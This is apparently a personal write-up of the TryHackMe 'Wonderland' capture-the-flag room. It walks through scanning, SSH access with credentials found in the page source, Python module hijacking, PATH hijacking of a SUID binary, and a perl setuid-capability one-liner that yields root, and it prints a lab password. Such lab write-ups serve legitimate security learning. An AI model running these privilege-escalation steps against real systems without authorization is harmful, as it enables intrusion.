TryHackMe has a series about Alice in Wonderland, which comprises 2 machines to root. This is the writeup for the first machine.
Table of Contents
Scanning and Enumeration
I started with a NMap scan which found a website and the port 22 open:
root@ip-10-10-215-90:~# nmap -A -T4 10.10.35.122 Starting Nmap 7.60 ( https://nmap.org ) at 2023-04-11 15:48 BST Nmap scan report for ip-10-10-35-122.eu-west-1.compute.internal (10.10.35.122) Host is up (0.0095s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA) | 256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA) |_ 256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (EdDSA) 80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API) |_http-title: Follow the white rabbit. MAC Address: 02:EE:DE:10:1E:97 (Unknown) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.60%E=4%D=4/11%OT=22%CT=1%CU=37751%PV=Y%DS=1%DC=D%G=Y%M=02EEDE%T OS:M=6435736E%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=109%TI=Z%CI=Z%TS=A OS:)SEQ(SP=103%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M2301ST11NW7%O2=M23 OS:01ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11NW7%O5=M2301ST11NW7%O6=M2301ST11) OS:WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W= OS:F507%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N OS:)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0 OS:%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7 OS:(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN= OS:0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 9.50 ms ip-10-10-35-122.eu-west-1.compute.internal (10.10.35.122)
Looked like a classic web application hacking + privilege escalation, so I’ve launched a gobuster on the website to find out any interesting page, while I manually looked around the website itself:
root@ip-10-10-215-90:~# gobuster dir -t 32 --url http://10.10.35.122 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.35.122 [+] Threads: 32 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2023/04/11 15:54:54 Starting gobuster =============================================================== /img (Status: 301) /r (Status: 301) /poem (Status: 301) /http%3A%2F%2Fwww (Status: 301) /http%3A%2F%2Fyoutube (Status: 301) /http%3A%2F%2Fblogs (Status: 301) /http%3A%2F%2Fblog (Status: 301) /**http%3A%2F%2Fwww (Status: 301) /http%3A%2F%2Fcommunity (Status: 301) /http%3A%2F%2Fradar (Status: 301) /http%3A%2F%2Fjeremiahgrossman (Status: 301) /http%3A%2F%2Fweblog (Status: 301) /http%3A%2F%2Fswik (Status: 301) =============================================================== 2023/04/11 15:55:10 Finished ===============================================================
Since this was an Alice in Wonderland themed room, of course the website had a “follow the rabbit” quote in it. I had a suspicion, and I ran a quick gobuster scan to confirm it:
root@ip-10-10-215-90:~# gobuster dir -t 32 --url http://10.10.35.122/r -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.35.122/r [+] Threads: 32 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2023/04/11 16:00:14 Starting gobuster =============================================================== /a (Status: 301) [scan stopped as soon as I got what I needed]
It looked like the website had a folder structure as http://10.10.35.122/r/a/b/b/i/t/ so I went directly on this link and I found another Alice in Wonderland quote.
What was useful though, was finding in the source code of that page an hidden text that looked like credentials:
Initial access
I used those credentials to login via SSH as the user “alice” and I was in.
alice@wonderland:~$ ls -la total 40 drwxr-xr-x 5 alice alice 4096 May 25 2020 . drwxr-xr-x 6 root root 4096 May 25 2020 .. lrwxrwxrwx 1 root root 9 May 25 2020 .bash_history -> /dev/null -rw-r--r-- 1 alice alice 220 May 25 2020 .bash_logout -rw-r--r-- 1 alice alice 3771 May 25 2020 .bashrc drwx------ 2 alice alice 4096 May 25 2020 .cache drwx------ 3 alice alice 4096 May 25 2020 .gnupg drwxrwxr-x 3 alice alice 4096 May 25 2020 .local -rw-r--r-- 1 alice alice 807 May 25 2020 .profile -rw------- 1 root root 66 May 25 2020 root.txt -rw-r--r-- 1 root root 3577 May 25 2020 walrus_and_the_carpenter.py alice@wonderland:~$
Sudo -l gave me an hint on the next step in the solution of this machine:
alice@wonderland:~$ sudo -l
[sudo] password for alice:
Matching Defaults entries for alice on wonderland:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alice may run the following commands on wonderland:
(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
alice@wonderland:~$
I could run that specific python script as user “rabbit”, so there was likely a way to use that to switch to the user rabbit and continue my exploration of this machine.
“walrus_and_the_carpenter.py” was a python script that imported the “random” module and then used it to get 10 random quotes from a text inside the script itself (the text was a poem by Lewis Carroll, the author of Alice in Wonderland).
It took me a while to figure it out, as I’m a bit rusty on the Python language, but eventually I find out that as the script was loading “random”, I could create a random.py file inside that folder, and the script would load that instead of the standard “random” module.
Lateral movements
I created the random.py file with the following code:
import os
os.system("/bin/bash")
And it gave me a shell as the user “rabbit”:
alice@wonderland:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py rabbit@wonderland:~$ id uid=1002(rabbit) gid=1002(rabbit) groups=1002(rabbit)
Inside the rabbit home folder there was a script, teaParty, with SUID set.
Running the script wouldn’t provide as much information:
rabbit@wonderland:/home/rabbit$ ./teaParty Welcome to the tea party! The Mad Hatter will be here soon. Probably by Tue, 11 Apr 2023 17:47:27 +0000 Ask very nicely, and I will give you some tea while you wait for him Segmentation fault (core dumped) rabbit@wonderland:/home/rabbit$
But when looking inside the file, it was clear what I could try next:
Similar to the python script, here there was a call to a software that could be hijacked, as in this case the “date” wasn’t using an absolute path.
So, I added /tmp in the PATH$ variable:
rabbit@wonderland:/home/rabbit$ export PATH=/tmp:$PATH rabbit@wonderland:/home/rabbit$ echo $PATH /tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin rabbit@wonderland:/home/rabbit$
and created a “date” script that, in this case, would open a bash shell with the privileges of the teaParty file. This was the code inside the fake “date”:
#!/bin/bash /bin/bash
And it worked, I got the shell as the “hatter” user:
rabbit@wonderland:/home/rabbit$ chmod +x /tmp/date rabbit@wonderland:/home/rabbit$ ./teaParty Welcome to the tea party! The Mad Hatter will be here soon. Probably by hatter@wonderland:/home/rabbit$ hatter@wonderland:/home/rabbit$
There was a password.txt file inside the hatter’s home folder:
hatter@wonderland:/home$ id uid=1003(hatter) gid=1002(rabbit) groups=1002(rabbit) hatter@wonderland:/home$ cd hatter/ hatter@wonderland:/home/hatter$ ls -la total 28 drwxr-x--- 3 hatter hatter 4096 May 25 2020 . drwxr-xr-x 6 root root 4096 May 25 2020 .. lrwxrwxrwx 1 root root 9 May 25 2020 .bash_history -> /dev/null -rw-r--r-- 1 hatter hatter 220 May 25 2020 .bash_logout -rw-r--r-- 1 hatter hatter 3771 May 25 2020 .bashrc drwxrwxr-x 3 hatter hatter 4096 May 25 2020 .local -rw-r--r-- 1 hatter hatter 807 May 25 2020 .profile -rw------- 1 hatter hatter 29 May 25 2020 password.txt hatter@wonderland:/home/hatter$ cat password.txt WhyIsARavenLikeAWritingDesk?
And, as shown with the above “id” command, I was still in the group “rabbit” rather than hatter.
So I logged in via SSH using the hatter’s credentials, and once got the proper user, I started digging around for ways to escalate my privileges to the root user.
Privilege escalation
I found out that this user had capabilities set for “perl”:
hatter@wonderland:/home$ getcap -r / 2>/dev/null /usr/bin/perl5.26.1 = cap_setuid+ep /usr/bin/mtr-packet = cap_net_raw+ep /usr/bin/perl = cap_setuid+ep
At that point, it was a simple matter of running a command to get the root shell:
hatter@wonderland:~$ /usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";' # id uid=0(root) gid=1003(hatter) groups=1003(hatter)
With that, I got the two flags (user, and root) and finished this room. I think the user flag could be seen by directly using cat /root/user.txt by thinking about the fact that if the root.txt was in the user home, so maybe the user.txt was in the root home (in line with the mad hatter character).
I honestly didn’t think about this, and as I was going to get the root privileges eventually, I postponed to searching for the user flag directly once I was root.
